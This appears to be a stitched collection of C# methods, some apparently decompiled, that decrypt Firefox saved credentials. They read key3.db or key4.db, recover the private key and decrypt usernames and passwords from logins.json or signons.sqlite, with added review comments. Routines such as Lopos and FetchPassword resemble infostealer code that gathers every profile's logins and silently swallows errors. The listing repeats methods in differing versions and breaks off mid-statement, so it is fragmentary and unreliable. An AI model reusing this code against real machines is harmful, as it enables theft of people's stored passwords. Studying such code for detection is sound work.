// Lopos: for each entry under "logins" in a temp copy of <profile>\logins.json, Base64-decodes and
// ASN.1-parses encryptedUsername / encryptedPassword, decrypts both via TripleDESHelper.DESCBCDecryptor
// with the supplied privateKey (PKCS7 padding), and strips every character outside U+0020..U+007F.
// GetPasswords.Cpassword is incremented once per entry, before any decryption is attempted.
// NOTE(review): part of this line is masked ("******") in this listing, so the statements between
// credential.Add(...) and the use of credential[i] are not visible and are not documented here.
// The empty catch swallows every exception, so a failure produces no output and no error.
// Defender note: the observable behaviour is a copy and read of logins.json from a browser profile directory.
public static void Lopos(string profile, byte[] privateKey, string browser_name, string profile_name) { try { string path = CreateTempCopy(Path.Combine(profile, "logins.json")); if (File.Exists(path)) { { foreach (JsonValue item in File.ReadAllText(path).FromJSON()["logins"]) { GetPasswords.Cpassword++; Asn1DerObject Gecko4 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedUsername"].ToString(saving: false))); Asn1DerObject Gecko42 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedPassword"].ToString(saving: false))); string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko4.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko4.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko42.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko42.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); credential.Add("Site_Url : " + item["hostname"] + Environment.NewLine + "Login : "******"Password : "******"Browser : " + browser_name + Environment.NewLine + "Profile : " + profile_name + Environment.NewLine + credential[i]); } credential.Clear(); } } } catch (Exception) { } }
/// <summary>
/// Decrypts one ASN.1-wrapped value with the instance's private key and returns it
/// with every character outside U+0020..U+007F removed.
/// </summary>
/// <param name="data">DER-encoded blob; the IV argument is read from Objects[0].Objects[1].Objects[1]
/// and the encrypted payload from Objects[0].Objects[2].</param>
/// <returns>The filtered plaintext. Non-ASCII characters are silently dropped, so the result
/// may differ from the stored value.</returns>
public string DecryptData(byte[] data)
{
    var parsed = Asn1Der.Parse(data);

    // Same two operands the decryptor expects after the key: IV first, then ciphertext.
    var iv = parsed.Objects[0].Objects[1].Objects[1].Data;
    var cipherText = parsed.Objects[0].Objects[2].Data;

    string plainText = TripleDesHelper.DescbcDecryptor(_privateKey, iv, cipherText);

    // Keep only U+0020..U+007F; this also discards padding and control bytes.
    return Regex.Replace(plainText, @"[^\u0020-\u007F]", "");
}
// CheckKey4DB: runs "SELECT item1,item2 FROM metadata WHERE id = 'password'" through GetItemsFromQuery,
// decrypts the check value and requires it to start with "password-check", then reads a11/a102 from
// nssPrivate and returns decrypt3DES(item1, masterPwd, entrySalt, cipherT).
// Returns null when the check fails or when any exception is caught.
// NOTE(review): the check is computed with an empty password (Encoding.ASCII.GetBytes("")), not with
// masterPwd; masterPwd is only passed to the final decrypt3DES call. As written, a store whose check value
// does not decrypt under the empty password returns null here regardless of masterPwd; confirm intent.
// GetItemsFromQuery and decrypt3DES are not shown in this listing; presumably the former opens key4.db under dir.
// Verbose only adds progress lines; the caught exception's Message is printed ("Exeption:" is the original spelling).
public byte[] CheckKey4DB(string dir, string masterPwd, bool Verbose) { try { Asn1Der asn = new Asn1Der(); byte[] item2 = new byte[] { }; byte[] item1 = new byte[] { }; byte[] a11 = new byte[] { }; byte[] a102 = new byte[] { }; string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'"; if (Verbose) { Console.WriteLine("Fetch data from key4.db file"); } GetItemsFromQuery(dir, ref item1, ref item2, query); Asn1DerObject f800001 = asn.Parse(item2); MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong !"); return(null); } query = "SELECT a11,a102 FROM nssPrivate"; GetItemsFromQuery(dir, ref a11, ref a102, query); var decodedA11 = asn.Parse(a11); var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data; var cipherT = decodedA11.objects[0].objects[1].Data; if (Verbose) { Console.WriteLine("Fetch Private key"); } return(decrypt3DES(item1, masterPwd, entrySalt, cipherT)); } catch (Exception ex) { Console.WriteLine("Exeption:\n" + ex.Message); return(null); } }
// Main: calls Searcher.CopyLoginsInSafeDir(), blocks on Console.ReadLine(), then opens "key4.db" with
// BerkeleyDB. filePath is the empty string, so Path.Combine yields the bare file name "key4.db".
// MasterPwd is always the empty string; there is no argument parsing in this method.
// NOTE(review): decryptedPwdChk is computed but never compared, and privateKey is not used after it is
// built, so as shown the method ends without producing output. dt and Verbose are unused as well.
// NOTE(review): FirstOrDefault() can return null when a key is absent, and the chained .Replace would then
// throw; nothing here catches it.
// NOTE(review): key4.db is opened through BerkeleyDB here; confirm that class accepts this file.
private static void Main() { Searcher.CopyLoginsInSafeDir(); Console.ReadLine(); string MasterPwd = string.Empty; bool Verbose = false; string filePath = string.Empty; var dt = new DataTable(); var asn = new Asn1Der(); var db = new BerkeleyDB(Path.Combine(filePath, "key4.db")); var pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "")); string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", ""); string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""); var CheckPwd = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), MasterPassword.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, MasterPassword.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); Asn1DerObject f800001 = asn.Parse(MasterPassword.ConvertHexStringToByteArray(f81)); MozillaPBE CheckPrivateKey = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } }
// ExtractPrivateKey3: opens `file` with BerkeleyDB, reads the "password-check" and "global-salt" values,
// derives key/IV with MozillaPBE using an empty password, decrypts the remaining (non-reserved) entry and
// returns the last 24 bytes of the nested Data field, or that field as-is when it is 24 bytes or shorter.
// The "Token / RID / RVA / File Offset" comment at the start of the next line is decompiler metadata.
// The password-check decryption result is discarded, so nothing here verifies the password before continuing.
// Returns the initial 24-byte zero array when the file is missing or an exception is swallowed by the bare
// catch, so callers cannot distinguish failure by null or length.
// NOTE(review): decrypted bytes are round-tripped through Encoding.Default strings; presumably lossy on
// some code pages; confirm against TripleDESHelper.
// The source path is written to the console before the existence check.
// Token: 0x060000E9 RID: 233 RVA: 0x000076D8 File Offset: 0x000058D8 private static byte[] ExtractPrivateKey3(string file) { byte[] array = new byte[24]; try { Console.WriteLine("Key source file: " + file); if (!File.Exists(file)) { Console.WriteLine("Source file UNKNOWN"); return(array); } new DataTable(); Asn1Der asn1Der = new Asn1Der(); BerkeleyDB berkeleyDB = new BerkeleyDB(file); PasswordCheck passwordCheck = new PasswordCheck(FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("global-salt")); MozillaPBE mozillaPBE = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); mozillaPBE.Compute(); TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None); string hexString2 = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")); Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2)); MozillaPBE mozillaPBE2 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data); mozillaPBE2.Compute(); byte[] bytes = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data, PaddingMode.None)); Asn1DerObject asn1DerObject2 = asn1Der.Parse(bytes); Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data); if (asn1DerObject3.objects[0].objects[3].Data.Length > 24) { Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24); } else { array = 
asn1DerObject3.objects[0].objects[3].Data; } } catch { } return(array); }
// CheckKey4DB: reads item1/item2 from the "metadata" row with id = 'password', requires the decrypted
// check value to start with "password-check", then reads a11/a102 from nssPrivate and returns
// decrypt3DES(item1, masterPwd, entrySalt, cipherT). Returns null on a failed check or any exception.
// NOTE(review): the check is computed with an empty password (Encoding.ASCII.GetBytes("")), not masterPwd,
// so "Master password is wrong !" is reported whenever the empty password does not decrypt the check
// value, whatever masterPwd holds; confirm intent.
// The catch block discards ex without logging, so callers see only null. a102 is fetched but never read.
// GetItemsFromQuery and decrypt3DES are defined elsewhere and are not shown in this listing.
private byte[] CheckKey4DB(string dir, string masterPwd) { try { ErrorHandle eh = new ErrorHandle(); Asn1Der asn = new Asn1Der(); byte[] item2 = new byte[] { }; byte[] item1 = new byte[] { }; byte[] a11 = new byte[] { }; byte[] a102 = new byte[] { }; string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'"; GetItemsFromQuery(dir, ref item1, ref item2, query); Asn1DerObject f800001 = asn.Parse(item2); MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data); if (!decryptedPwdChk.StartsWith("password-check")) { eh.ErrorFunc("Master password is wrong !"); return(null); } query = "SELECT a11,a102 FROM nssPrivate"; GetItemsFromQuery(dir, ref a11, ref a102, query); var decodedA11 = asn.Parse(a11); var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data; var cipherT = decodedA11.objects[0].objects[1].Data; return(decrypt3DES(item1, masterPwd, entrySalt, cipherT)); } catch (Exception ex) { return(null); } }
// ExtractLogins: makes a temp copy of <profile>\logins.json via ChromiumManager.CreateTempCopy, deserialises
// it to RootLogin, and for each entry decrypts encryptedUsername / encryptedPassword with privateKey
// (PKCS7 padding), stripping characters outside U+0020..U+007F.
// The "Token / RID / RVA / File Offset" comment at the start of the next line is decompiler metadata.
// An entry is returned only when URL, Login and Password are all non-empty; empty fields are replaced by
// the sentinel "UNKNOWN" and the whole entry is then dropped.
// Any exception ends the loop, is printed to the console, and the entries collected so far are returned.
// NOTE(review): nothing here deletes the temp copy; whether CreateTempCopy cleans up is not visible.
// Defender note: the temp copy of logins.json is an on-disk artefact of this routine.
// Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290 private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey) { List <BrowserCredendtial> list = new List <BrowserCredendtial>(); try { string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json")); if (!File.Exists(path)) { return(list); } RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>(); Asn1Der asn1Der = new Asn1Der(); foreach (LoginJson loginJson in rootLogin.logins) { Asn1DerObject asn1DerObject = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername)); Asn1DerObject asn1DerObject2 = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword)); string text = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); string text2 = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty); BrowserCredendtial browserCredendtial = new BrowserCredendtial { URL = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname), Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text), Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2) }; if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN") { list.Add(browserCredendtial); } } } catch (Exception value) { Console.WriteLine(value); } return(list); }
// P4k: reads the "metaData" table of `file` through CNT, derives key/IV with MozillaPBE from item1 and an
// empty password, then scans "nssPrivate" for the row whose a102 equals Key4MagicNumber and decrypts that
// row's a11 value (PKCS7 padding). The decrypted string is returned as Encoding.Default bytes.
// Returns the initial 24-byte zero array when the file is missing or any exception is caught, so failure
// is not distinguishable from the return value's type or length.
// The first DESCBCDecryptor result is discarded; no "password-check" comparison is made in this method.
// NOTE(review): the second column name is the literal "item2)" (with a closing parenthesis); what
// ParseValue returns for that name is not visible here.
// NOTE(review): binary values travel as strings via Encoding.Default; presumably lossy on some code pages.
// CNT and Key4MagicNumber are defined elsewhere and are not shown in this listing.
private static byte[] P4k(string file) { byte[] result = new byte[24]; try { if (!File.Exists(file)) { return(result); } var cNT = new CNT(file); cNT.ReadTable("metaData"); string s = cNT.ParseValue(0, "item1"); string s2 = cNT.ParseValue(0, "item2)"); Asn1DerObject ansobjectS2 = Asn1Der.Parse(Encoding.Default.GetBytes(s2)); byte[] objectData = ansobjectS2.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData(); byte[] objectData2 = ansobjectS2.Objects[0].Objects[1].GetObjectData(); var inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData); inizialize.Compute(); TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2); cNT.ReadTable("nssPrivate"); int rowLength = cNT.RowLength; string s3 = string.Empty; for (int i = 0; i < rowLength; i++) { if (cNT.ParseValue(i, "a102") == Encoding.Default.GetString(Key4MagicNumber)) { s3 = cNT.ParseValue(i, "a11"); break; } } Asn1DerObject ansobjectS3 = Asn1Der.Parse(Encoding.Default.GetBytes(s3)); objectData = ansobjectS3.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData(); objectData2 = ansobjectS3.Objects[0].Objects[1].GetObjectData(); inizialize = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData); inizialize.Compute(); result = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2, PaddingMode.PKCS7)); return(result); } catch (Exception) { return(result); } }
// P3k: opens `file` with BerkeleyDB, reads "password-check" and "global-salt" through ValueDB, derives
// key/IV with MozillaPBE using an empty password, decrypts the remaining (non-reserved) entry and returns
// the last 24 bytes of the nested object data, or that data as-is when it is 24 bytes or shorter.
// Returns the initial 24-byte zero array when the file is missing or any exception is caught.
// The password-check decryption result is discarded, so nothing here verifies the password before continuing.
// NOTE(review): decrypted bytes are round-tripped through Encoding.Default strings before ASN.1 parsing;
// presumably lossy on some code pages; confirm against TripleDESHelper.
// The bare "new DataTable();" allocates an object that is never used.
private static byte[] P3k(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } new DataTable(); var berkeleyDB = new BerkeleyDB(file); var Gecko7 = new PasswordCheck(ValueDB(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = ValueDB(berkeleyDB, (string x) => x.Equals("global-salt")); var Gecko8 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ConvertHexStringToByteArray(Gecko7.EntrySalt)); Gecko8.Compute(); TripleDESHelper.DESCBCDecryptor(Gecko8.GetKey(), Gecko8.GetIV(), ConvertHexStringToByteArray(Gecko7.Passwordcheck)); Asn1DerObject Gecko4 = Asn1Der.Parse(ConvertHexStringToByteArray(ValueDB(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")))); var Gecko82 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), Gecko4.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData()); Gecko82.Compute(); Asn1DerObject Gecko42 = Asn1Der.Parse(Asn1Der.Parse(Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(Gecko82.GetKey(), Gecko82.GetIV(), Gecko4.Objects[0].Objects[1].GetObjectData()))).Objects[0].Objects[2].GetObjectData()); if (Gecko42.Objects[0].Objects[3].GetObjectData().Length <= 24) { array = Gecko42.Objects[0].Objects[3].GetObjectData(); return(array); } Array.Copy(Gecko42.Objects[0].Objects[3].GetObjectData(), Gecko42.Objects[0].Objects[3].GetObjectData().Length - 24, array, 0, 24); return(array); } catch (Exception) { return(array); } }
private static void ParseLogins(string directory, string userName, string masterPassword = "") { // Read berkeleydb Asn1Der asn = new Asn1Der(); BerkeleyDB db = new BerkeleyDB(Path.Combine(directory, "key3.db")); PasswordCheck pwdCheck = new PasswordCheck(db.GetValueOfKey("password-check").Replace("-", "")); //string GlobalSalt = (from p in db.Keys // where p.Key.Equals("global-salt") // select p.Value).FirstOrDefault().Replace("-", ""); string GlobalSalt = db.GetValueOfKey("global-salt").Replace("-", ""); MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); if (!decryptedPwdChk.StartsWith("password-check")) { Console.WriteLine("Master password is wrong; cannot decrypt FireFox logins."); return; } // Get private key string f81 = String.Empty; String[] blacklist = { "global-salt", "Version", "password-check" }; foreach (var k in db.Keys) { if (Array.IndexOf(blacklist, k.Key) == -1) { f81 = k.Value.Replace("-", ""); } } if (f81 == String.Empty) { Console.WriteLine("[X] Could not retrieve private key."); return; } Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81)); MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); byte[] privateKey = new byte[24]; if 
(f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = f800001deriv2.objects[0].objects[3].Data; } // decrypt username and password string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json"); Login[] logins = ParseLoginFile(loginsJsonPath); if (logins.Length == 0) { Console.WriteLine("No logins discovered from logins.json"); return; } foreach (Login login in logins) { Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(login.encryptedPassword)); string hostname = login.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName); Console.WriteLine("Hostname: {0}", hostname); Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "")); Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "")); Console.WriteLine(); } }
// CheckKey3DB: opens <filePath>\key3.db with BerkeleyDB, verifies MasterPwd by decrypting the
// "password-check" entry and requiring the result to start with "password-check", then decrypts the
// remaining (non-reserved) entry and returns the last 24 bytes of the nested Data field, or that field
// as-is when it is 24 bytes or shorter.
// Returns null when the password check fails (after eh.ErrorFunc) or when any exception is caught.
// NOTE(review): FirstOrDefault() can return null when a key is absent; the chained .Replace then throws
// and is absorbed by the catch, which discards ex without logging.
// Unlike the key4 variants in this listing, the check here is computed with MasterPwd itself.
private byte[] CheckKey3DB(string filePath, string MasterPwd) { try { Converts conv = new Converts(); ErrorHandle eh = new ErrorHandle(); Asn1Der asn = new Asn1Der(); BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db")); // Verify MasterPassword PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "")); string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", ""); MozillaPBE CheckPwd = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), conv.ConvertHexStringToByteArray(pwdCheck.EntrySalt)); CheckPwd.Compute(); string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, conv.ConvertHexStringToByteArray(pwdCheck.Passwordcheck)); if (!decryptedPwdChk.StartsWith("password-check")) { eh.ErrorFunc("Master password is wrong !"); return(null); } // Get private key string f81 = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""); Asn1DerObject f800001 = asn.Parse(conv.ConvertHexStringToByteArray(f81)); MozillaPBE CheckPrivateKey = new MozillaPBE(conv.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data); CheckPrivateKey.Compute(); byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data); Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001); Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data); byte[] privateKey = new byte[24]; if (f800001deriv2.objects[0].objects[3].Data.Length > 24) { Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24); } else { privateKey = 
f800001deriv2.objects[0].objects[3].Data; } return(privateKey); } catch (Exception ex) { return(null); } }
public List <LoginFieldS> FetchPassword() { try { byte[] privateKey = new byte[24]; bool loginsFound = false, signonsFound = false; string signonsFile = string.Empty, loginsFile = string.Empty;; ErrorHandle eh = new ErrorHandle(); string MasterPwd = string.Empty; string filePath = string.Empty; Converts conv = new Converts(); // Read berkeleydb DataTable dt = new DataTable(); Asn1Der asn = new Asn1Der(); List <LoginFieldS> lp = new List <LoginFieldS>(); var ffPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles"); if (!Directory.Exists(ffPath)) { return(lp); } var dirs = Directory.GetDirectories(ffPath); foreach (string dir in dirs) { try { string[] files = Directory.GetFiles(dir, "signons.sqlite"); if (files.Length > 0) { filePath = dir; signonsFile = files[0]; signonsFound = true; } // find logins.json file files = Directory.GetFiles(dir, "logins.json"); if (files.Length > 0) { filePath = dir; loginsFile = files[0]; loginsFound = true; } if (!loginsFound && !signonsFound) { eh.ErrorFunc("File signons & logins not found."); continue; } if (filePath == string.Empty) { eh.ErrorFunc("Mozilla not found."); continue; } // Check if files exists if (!File.Exists(Path.Combine(filePath, "key3.db"))) { privateKey = CheckKey4DB(dir, MasterPwd); } else { privateKey = CheckKey3DB(dir, MasterPwd); } if (privateKey == null || privateKey.Length == 0) { eh.ErrorFunc("Private key return null"); continue; } // decrypt username and password FFLogins ffLoginData; DataBase dbLocal = new DataBase(); if (signonsFound) { using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite"))) { cnn.Open(); SQLiteCommand mycommand = new SQLiteCommand(cnn); mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;"; SQLiteDataReader reader = mycommand.ExecuteReader(); dt.Load(reader); } foreach (DataRow row in dt.Rows) { try { 
Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString())); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString())); string hostname = row["hostname"].ToString(); string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64); string title = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64); string url = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256); if (dbLocal.getInfoFromDB(url, username, "").Count == 0) { lp.Add(new LoginFieldS { url = url, userName = username, password = password, title = title }); } } catch (Exception ex) { continue; } } } if (loginsFound) { using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json"))) { string json = sr.ReadToEnd(); ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json); } foreach (LoginData loginData in ffLoginData.logins) { try { Asn1DerObject user = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername)); Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword)); string hostname = loginData.hostname; string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data); string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data); string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "").GetUTF8String(64); string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "").GetUTF8String(64); string 
title = HIOStaticValues.getTitleNameURI(hostname).GetUTF8String(64); string url = HIOStaticValues.getDomainNameURI(hostname).GetUTF8String(256); if (dbLocal.getInfoFromDB(url, username, "").Count == 0) { lp.Add(new LoginFieldS { url = url, userName = username, password = password, title = title }); } } catch (Exception ex) { continue; } } } } catch (Exception ex) { continue; } } return(lp); } catch (Exception ex) { throw ex; } }
public static int Main(string[] args) { string MasterPwd = string.Empty; bool Verbose = false; string filePath = string.Empty; //Manage args for (int i = 0; i < args.Length; i++) { if (args[i].Equals("-p")) { MasterPwd = args[i + 1]; } if (args[i].Equals("-f")) { filePath = args[i + 1]; } if (args[i].Equals("-v")) { Verbose = true; } if (args[i].Equals("-h")) { Console.WriteLine("FirePwd.Net v0.1"); Console.WriteLine("Usage :"); Console.WriteLine("\t -p to specify Master Password"); Console.WriteLine("\t -v to activate verbose mode"); Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite"); return(0); } } // Check if files exists if (!File.Exists(Path.Combine(filePath, "key3.db"))) { Console.WriteLine("File key3.db not found."); return(0); } if (!File.Exists(Path.Combine(filePath, "signons.sqlite"))) { Console.WriteLine("File key3.db not found."); return(0); } // Read berkeleydb DataTable dt = new DataTable(); Asn1Der asn = new Asn1Der(); BerkeleyDB db = new BerkeleyDB(Path.Combine(filePath, "key3.db")); if (Verbose) { Console.WriteLine(db.Version); } // Verify MasterPassword PasswordCheck pwdCheck = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "")); string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", ""); if (Verbose) { Console.WriteLine("GlobalSalt = " + GlobalSalt); Console.WriteLine("EntrySalt = " + pwdCheck.EntrySalt); } MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), 